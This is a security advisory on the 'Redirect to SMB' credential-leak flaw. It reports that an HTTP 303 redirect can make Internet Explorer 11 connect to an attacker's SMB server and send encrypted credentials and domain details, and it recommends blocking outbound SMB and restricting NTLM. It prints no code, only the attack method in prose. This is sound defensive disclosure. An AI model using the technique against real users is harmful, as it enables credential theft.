Details on new attack vectors for an 18-year-old vulnerability called “Redirect to SMB” were recently published, which could allow an attacker to redirect the user to a malicious SMB server and steal user credentials. We issued a security alert on this earlier this month.
One of the new attack vectors is HTTP-based in which a malicious website can issue an HTTP redirection status code. The HTTP status codes commonly used in redirection are 301 and 302, however a proof of concept was recently published showing that the 307 status code can also be used to exploit the Redirect to SMB vulnerability.
The Masergy Threat Intelligence team further investigated to see if other status codes could be used to exploit this vulnerability. We discovered that the “303 See Other” HTTP status code could be utilized to cause Internet Explorer (tested on IE version 11) to connect to a SMB server. In our testing, Firefox 37 and Chrome 42 were unaffected by this particular attack vector.
Example of Attack Vector
Similar to the attack vector described by Cylance, the Location HTTP header is used to cause the browser to connect to the malicious SMB server:
Figure 1. Attacker redirecting browser to malicious document
Figure 2, below, shows that a connection is made to the SMB server and the user’s credentials are sent to the server. In addition to sending the encrypted user credentials, exploitation of this vulnerability also leaks information by disclosing the user’s domain.
Figure 2 – Victim authenticating with the SMB server
To mitigate the risk of the successful exploitation of the vulnerability we recommend the following countermeasures:
Block outbound SMB traffic: Consider blocking outbound SMB connections (TCP ports 139 and 445) from the internal network.
Update NTLM group policy: This attack vector may be mitigated by updating your Group Policy security policies to restrict NTLM authentication with remote servers. See Reference One and Reference Two from Microsoft.